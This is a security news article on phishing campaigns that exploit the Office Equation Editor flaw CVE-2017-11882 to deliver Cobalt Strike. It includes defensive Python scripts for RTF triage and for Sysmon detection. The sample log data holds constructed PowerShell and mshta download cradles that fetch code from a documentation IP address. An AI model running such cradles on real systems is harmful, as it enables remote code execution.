Severe Microsoft Office Vulnerability Exploited to Deliver Cobalt Malware
A newly reported 17-year-old memory-corruption flaw in Microsoft Office, tracked as CVE-2017-11882, is being actively exploited to plant backdoor malware on targeted systems. The bug lives in the Equation Editor component that Office loads whenever a document embeds an equation object, so no macro and no "enable content" click is needed: opening a crafted attachment (and, for files that land in Protected View, clicking Enable Editing) is enough to hand the attacker code execution, which is why it has alarmed security teams.
Researchers at Fortinet were the first to report the activity, and the malware has been dubbed "Cobalt". The name comes from Cobalt Strike, a commercial adversary-simulation and penetration-testing framework whose Beacon implant is routinely repurposed by criminals. Beacon gives an operator covert command-and-control over a compromised host, which is exactly what makes it attractive to attackers.
The vulnerability is a stack buffer overflow in EQNEDT32.EXE, the Equation Editor that ships with Microsoft Office releases from 2007 through 2016, a component last compiled in 2000 and lacking modern exploit mitigations such as ASLR and stack cookies. When a user opens a malicious file, a remote attacker can execute arbitrary code in the context of the current user; if that user has administrative rights, the attacker effectively owns the machine. Microsoft shipped a fix in its November 2017 security updates, but many systems remain exposed because the update has not been applied.
Cybercriminals moved quickly once the vulnerability was disclosed, delivering the Cobalt payload through phishing emails. One recent campaign used messages disguised as notifications from Visa about regulatory changes in Russia; the attachment contained a malicious RTF document crafted to trigger CVE-2017-11882.
The emails also carried a password-protected archive, with the password written in the message body. Beyond lending an air of legitimacy, the encryption keeps mail gateways and sandboxes from inspecting the contents: an automated scanner that cannot open the archive has nothing to analyse, while the human reader has the password right there. In MITRE ATT&CK terms this is Initial Access through Phishing: Spearphishing Attachment (T1566.001), still one of the most common ways adversaries get a first foothold.
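A triage script for attachments of this kind, added here as an illustration (it is not code from the article or from Fortinet), follows. It pulls embedded OLE objects out of an RTF file and flags any that reference Equation Editor, checking three indicators the attacker has to leave in for the exploit to fire: the declared \objclass, the class name inside the OLE1 object header, and the Equation Editor CLSID or the "Equation Native" stream name in the payload. The sample RTF is constructed inside the block with placeholder payloads rather than real exploit data, and its obfuscated variant mimics evasions seen in wild samples (omitted \objclass, hex broken up by whitespace and ignorable groups).

```python
import re
import struct

# Indicators tied to the Equation Editor component (EQNEDT32.EXE) targeted by CVE-2017-11882.
EQNEDT_CLASS_NAMES = {"equation.3", "equation.2", "equation.dsmt4"}
# CLSID {0002CE02-0000-0000-C000-000000000046} as laid out on disk (first three fields little-endian).
EQNEDT_CLSID_BYTES = bytes.fromhex("02ce0200" "0000" "0000" "c000000000000046")
# OLE2 stream that holds MTEF equation data, UTF-16LE as stored in a compound-file directory entry.
EQUATION_NATIVE_STREAM = "Equation Native".encode("utf-16-le")
# RTF control words, \* destination markers and \'hh escapes that may be interleaved with the hex payload.
CONTROL_WORD = re.compile(r"\\[A-Za-z]+-?\d* ?|\\\*|\\'[0-9A-Fa-f]{2}")


def _group_body(text, start):
    """Return the text between the '{' at index start and its matching '}'."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start + 1:i]
    return text[start + 1:]


def _read_lp_string(buf, off):
    """Read a LengthPrefixedAnsiString (MS-OLEDS): 4-byte length, then NUL-terminated bytes."""
    (n,) = struct.unpack_from("<I", buf, off)
    off += 4
    return buf[off:off + n].rstrip(b"\0").decode("latin-1"), off + n


def parse_ole1_header(data):
    """Parse the OLE1 ObjectHeader at the start of an \\objdata blob; None if truncated."""
    try:
        version, fmt = struct.unpack_from("<II", data, 0)
        cls, off = _read_lp_string(data, 8)
        topic, off = _read_lp_string(data, off)
        item, off = _read_lp_string(data, off)
    except struct.error:
        return None
    return {"version": version, "format": fmt, "class": cls, "topic": topic,
            "item": item, "payload_offset": off}


def extract_objects(rtf):
    """Return one record per {\\object ...} group: declared class, parsed OLE1 header, raw bytes."""
    objects = []
    for m in re.finditer(r"\{\\object\b", rtf):
        body = _group_body(rtf, m.start())
        cls_m = re.search(r"\\objclass\s*([^{}\\]+)", body)
        declared = cls_m.group(1).strip() if cls_m else ""
        raw = b""
        data_m = re.search(r"\{\\\*\\objdata", body)
        if data_m:
            hex_text = CONTROL_WORD.sub("", _group_body(body, data_m.start()))
            hex_text = re.sub(r"[^0-9A-Fa-f]", "", hex_text)
            raw = bytes.fromhex(hex_text[:len(hex_text) & ~1])
        objects.append({"declared_class": declared, "header": parse_ole1_header(raw), "raw": raw})
    return objects


def is_equation_editor_object(obj):
    """True when any indicator ties the object to Equation Editor, whichever ones the attacker kept."""
    names = {obj["declared_class"].lower()}
    if obj["header"]:
        names.add(obj["header"]["class"].lower())
    if names & EQNEDT_CLASS_NAMES:
        return True
    return EQNEDT_CLSID_BYTES in obj["raw"] or EQUATION_NATIVE_STREAM in obj["raw"]


def triage(rtf):
    """Return (declared class, class from OLE1 header, flagged) for every embedded object."""
    out = []
    for obj in extract_objects(rtf):
        header_class = obj["header"]["class"] if obj["header"] else ""
        out.append((obj["declared_class"], header_class, is_equation_editor_object(obj)))
    return out


def _lp(s):
    s += b"\0"
    return struct.pack("<I", len(s)) + s


def _ole1(class_name, payload):
    """Build an OLE1 embedded-object record: version, FormatID 2 (embedded), names, native data."""
    return (struct.pack("<II", 0x501, 2) + _lp(class_name) + _lp(b"") + _lp(b"")
            + struct.pack("<I", len(payload)) + payload)


def build_sample_rtf(obfuscated=False):
    """Constructed sample, not a real exploit document: payloads are placeholders, not MTEF records."""
    eq_hex = _ole1(b"eqUATIon.3" if obfuscated else b"Equation.3", b"PLACEHOLDER, NOT MTEF DATA").hex()
    doc_hex = _ole1(b"Word.Document.8", b"PLACEHOLDER DOCUMENT DATA").hex()
    if obfuscated:
        # Evasions seen in the wild: \objclass omitted, hex broken up by whitespace and ignorable groups.
        chunks = [eq_hex[i:i + 7] for i in range(0, len(eq_hex), 7)]
        eq_group = "{\\object\\objemb{\\*\\objdata\n" + "{\\*\\ignoreme}\n".join(chunks) + "}}"
    else:
        eq_group = "{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata\n" + eq_hex + "}}"
    doc_group = "{\\object\\objemb{\\*\\objclass Word.Document.8}{\\*\\objdata\n" + doc_hex + "}}"
    return "{\\rtf1\\ansi\\deff0\n" + eq_group + "\nA harmless paragraph.\n" + doc_group + "\n}"


if __name__ == "__main__":
    for variant in (False, True):
        print("obfuscated" if variant else "plain", triage(build_sample_rtf(obfuscated=variant)))
```

Run it against a real attachment with `triage(open(path, encoding="latin-1").read())`. A hit on any of the three indicators is enough to quarantine the file for analysis; the declared \objclass alone is not, because it is the first thing attackers strip.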
When the victim opens the document, it shows an innocuous message prompting them to enable editing. In the background, the exploit makes the Equation Editor process launch a PowerShell script that silently downloads the Cobalt Strike client. From that point the operator controls the victim's machine and can move laterally through the network, running further commands to widen the foothold.
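The process chain just described is the part a defender can catch without any document-level signature: EQNEDT32.EXE has no business spawning child processes. The detection logic below is added here as an illustration, not taken from the article or from any vendor's rule set. It runs over constructed Sysmon-style process-creation events (not captured from this campaign), decodes -EncodedCommand arguments because Cobalt Strike's PowerShell stager is normally delivered that way, and generalises beyond the article to any Office application spawning a script interpreter. The image paths, the 192.0.2.10 address and the JSON-lines log format are assumptions.

```python
import base64
import json
import re
from pathlib import PureWindowsPath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe",
          "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe"}
# Strings that appear in nearly every PowerShell download cradle, the Cobalt Strike stager included.
CRADLE = re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|\biex\b"
                    r"|invoke-expression|frombase64string|start-bitstransfer", re.I)
# -EncodedCommand and the abbreviations PowerShell accepts for it (-e, -ec, -enc).
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def _name(path):
    return PureWindowsPath(path).name.lower()


def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE); '' when absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze_event(ev):
    """Return a finding for one process-creation event, or None when nothing matches."""
    image, parent = _name(ev["Image"]), _name(ev["ParentImage"])
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    reasons = []
    if parent == "eqnedt32.exe":
        reasons.append("child of Equation Editor (EQNEDT32.EXE): consistent with CVE-2017-11882 exploitation")
    elif parent in OFFICE_APPS and image in SHELLS:
        reasons.append(f"{parent} spawned {image}")
    if image in ("powershell.exe", "pwsh.exe"):
        if CRADLE.search(decoded):
            reasons.append("download cradle hidden in -EncodedCommand")
        elif CRADLE.search(cmd):
            reasons.append("download cradle on the command line")
    if not reasons:
        return None
    severity = "high" if parent == "eqnedt32.exe" or len(reasons) > 1 else "medium"
    return {"severity": severity, "image": image, "parent": parent, "reasons": reasons, "decoded": decoded}


def scan(log_lines):
    """Run analyze_event over newline-delimited JSON events; return findings in log order."""
    findings = []
    for line in log_lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 1:  # Sysmon event ID 1 = process creation
            continue
        finding = analyze_event(ev)
        if finding:
            findings.append(finding)
    return findings


# Constructed stager text; 192.0.2.0/24 is documentation address space, not a real C2.
CRADLE_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"
ENCODED_CRADLE = base64.b64encode(CRADLE_TEXT.encode("utf-16-le")).decode()
EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed Sysmon-style events (not captured from the campaign), one JSON object per line.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k DcomLaunch"},
    {"EventID": 1, "Image": EQNEDT, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": '"EQNEDT32.EXE" -Embedding'},  # COM server launch: normal when an equation is activated
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": EQNEDT,
     "CommandLine": "cmd.exe /c mshta http://192.0.2.10/p"},
    {"EventID": 1, "Image": PS, "ParentImage": EQNEDT,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED_CRADLE},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE", "CommandLine": "cmd.exe /c dir"},
    {"EventID": 3, "Image": PS, "DestinationIp": "192.0.2.10", "DestinationPort": 80},  # not a process event
])

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["parent"], "->", f["image"], "|", "; ".join(f["reasons"]))
```

The Equation Editor rule is deliberately unconditional: the legitimate process is a COM server started by svchost.exe with `-Embedding`, and it never needs to launch anything, so any child is worth an alert. The Office-spawns-interpreter rule fires more often in practice (macros, add-ins, admin scripts), which is why it is rated medium unless a download cradle is also present.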
The continued exploitation shows how exposed organisations become when patching lags: an unpatched 17-year-old component was all the attackers needed for a foothold. The November 2017 update that fixes CVE-2017-11882 should be applied promptly. Where it cannot be deployed immediately, Microsoft's advisory also documents a workaround that disables the Equation Editor COM object through the "Compatibility Flags" registry value, which removes the attack surface at the cost of losing the component; Microsoft later removed Equation Editor from Office altogether.
As cyber threats keep evolving, business owners need to stay vigilant. Regular software updates, together with training users to recognise phishing lures such as unexpected "password in the email" attachments, go a long way towards protecting operations against increasingly sophisticated attacks. This incident is a potent reminder of the basic steps needed to keep sensitive data out of adversaries' hands.